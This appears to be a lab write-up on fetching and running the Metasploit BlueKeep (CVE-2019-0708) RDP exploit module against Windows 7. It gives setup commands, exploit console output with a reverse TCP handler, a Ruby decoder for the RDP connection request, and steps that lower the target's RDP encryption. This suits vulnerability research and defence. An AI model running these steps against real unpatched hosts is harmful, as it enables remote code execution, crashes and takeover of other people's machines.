Testing Bluekeep CVE-2019–0708 Metasploit Module on Windows 7

Setting Up

UPDATE: It seems the pull request has been approved and merged into the project’s master branch, so it is no longer necessary to fetch pull/12283 as a separate remote ref; cloning master is enough.

#git clone https://github.com/rapid7/metasploit-framework.git
#cd metasploit-framework/
#git fetch origin pull/12283/head:bluekeep
#git checkout bluekeep
#gem install bundler
#bundler
#apt install libpq-dev
#bundler
#apt install libpcap-dev -y
#bundler
#apt install libsqlite3-dev
#bundler
#./msfconsole

Getting a Blue Screen

msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > run

[*] Started reverse TCP handler on 172.24.1.10:4444
[*] 172.24.1.20:3389 - Detected RDP on 172.24.1.20:3389 (Windows version: 6.1.7601) (Requires NLA: No)
[+] 172.24.1.20:3389 - The target is vulnerable.
[*] 172.24.1.20:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028600000, Channel count 1.
[*] 172.24.1.20:3389 - Surfing channels ...
[*] 172.24.1.20:3389 - Lobbing eggs ...
[*] 172.24.1.20:3389 - Forcing the USE of FREE'd object ...
[*] Exploit completed, but no session was created.

Finding the NPP

The module is currently ranked as Manual, as the user needs to supply additional target information or risk crashing the target host. The module implements a default fingerprint-only TARGET option that just checks for a vulnerable host and displays some initial information about the specific target OS, but the user will need to specify a more exact target based on secondary recon, or until further improvements in this module enable more accurate determination of the target kernel memory layout at runtime.

Searching nonpaged pool (fffffa8002402000 : fffffa805fc00000) for tag 0x2020202a (*   )

Finally

[*] 10.2.2.2:3389 - Verifying RDP protocol...
[*] 10.2.2.2:3389 - Attempting to connect using TLS security
[*] 10.2.2.2:3389 - Send data: 0300002d28e00000000000436f6f6b69653a206d737473686173683d575056517971720d0a010008000b000000 # this is a debug line I put in lib/msf/core/exploit/rdp.rb
[-] 10.2.2.2:3389 - Connection reset
[*] 10.2.2.2:3389 - Cannot reliably check exploitability.
[-] 10.2.2.2:3389 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
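The "Send data" bytes logged above are the very first thing an RDP client puts on the wire: a TPKT header, an X.224 Connection Request, the mstshash cookie and an RDP_NEG_REQ that lists the security protocols the client is willing to negotiate. The decoder below is an added example and not code from the post or from the Metasploit module; it parses that captured request and names the requested protocols (the bit values are from MS-RDPBCGR 2.2.1.1.1), which is useful when you are working out why a server resets the connection at this step or when writing a detection rule that inspects RDP negotiation.

```ruby
# Decode the TPKT + X.224 Connection Request + RDP_NEG_REQ that opens an RDP
# session. Added example; the sample bytes are the ones logged in the post.

# requestedProtocols bits in RDP_NEG_REQ (MS-RDPBCGR 2.2.1.1.1).
RDP_PROTOCOLS = {
  0x00000001 => 'PROTOCOL_SSL',
  0x00000002 => 'PROTOCOL_HYBRID',
  0x00000004 => 'PROTOCOL_RDSTLS',
  0x00000008 => 'PROTOCOL_HYBRID_EX',
}.freeze

TYPE_RDP_NEG_REQ = 0x01

def parse_x224_connection_request(hex)
  data = [hex.delete(" \n")].pack('H*')
  raise ArgumentError, 'short TPKT header' if data.bytesize < 4

  # TPKT: version(1) reserved(1) length(2, big-endian, covers the whole packet).
  version, _reserved, tpkt_len = data.unpack('CCn')
  raise ArgumentError, "bad TPKT version #{version}" unless version == 3
  raise ArgumentError, "TPKT length #{tpkt_len} != #{data.bytesize} bytes" unless tpkt_len == data.bytesize

  # X.224: LI(1) code(1) dst-ref(2) src-ref(2) class(1); code 0xE0 is Connection Request.
  x224 = data.byteslice(4..)
  li, code, dst_ref, src_ref, class_opt = x224.unpack('CCnnC')
  raise ArgumentError, 'not an X.224 Connection Request' unless (code & 0xF0) == 0xE0
  raise ArgumentError, 'X.224 LI mismatch' unless li == x224.bytesize - 1

  payload = x224.byteslice(7..)
  result = { tpkt_length: tpkt_len, dst_ref: dst_ref, src_ref: src_ref, class: class_opt }

  # Optional cookie: ASCII "Cookie: mstshash=<user>" terminated by CR LF.
  if payload.start_with?('Cookie: ')
    crlf = payload.index("\r\n")
    raise ArgumentError, 'unterminated cookie' if crlf.nil?
    result[:cookie] = payload.byteslice(8, crlf - 8)
    payload = payload.byteslice(crlf + 2..)
  end

  # Optional RDP_NEG_REQ: type(1) flags(1) length(2, always 8) requestedProtocols(4), little-endian.
  if payload.bytesize >= 8 && payload.getbyte(0) == TYPE_RDP_NEG_REQ
    _type, flags, length, protocols = payload.unpack('CCvV')
    raise ArgumentError, "RDP_NEG_REQ length #{length} != 8" unless length == 8
    result[:neg_flags] = flags
    result[:requested_protocols] = protocols
    result[:protocol_names] = RDP_PROTOCOLS.select { |bit, _| protocols & bit != 0 }.values
    result[:protocol_names] = ['PROTOCOL_RDP (standard RDP security only)'] if protocols.zero?
    payload = payload.byteslice(8..)
  else
    # A client that sends no RDP_NEG_REQ can only do legacy standard RDP security.
    result[:requested_protocols] = nil
    result[:protocol_names] = ['(no RDP_NEG_REQ: standard RDP security)']
  end

  result[:trailing_bytes] = payload.bytesize
  result
end

# Constructed input: the hex string logged by the debug line above.
SAMPLE_CR = '0300002d28e00000000000436f6f6b69653a206d737473686173683d575056517971720d0a010008000b000000'

if $PROGRAM_NAME == __FILE__
  parse_x224_connection_request(SAMPLE_CR).each { |k, v| puts "#{k}: #{v.inspect}" }
end
```

For the captured request this yields a 45-byte TPKT, the cookie mstshash=WPVQyqr and requestedProtocols 0x0b, i.e. PROTOCOL_SSL, PROTOCOL_HYBRID and PROTOCOL_HYBRID_EX: the client offered TLS and CredSSP (NLA) and the server answered by resetting the connection rather than with an X.224 Connection Confirm.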

- gpedit.msc;
- Computer Policy > Administrative Templates > Windows Components > Remote Desktop Services > Remote Desktop Session Host, then click Security;
- In “Set client connection encryption level”, set Low Level.
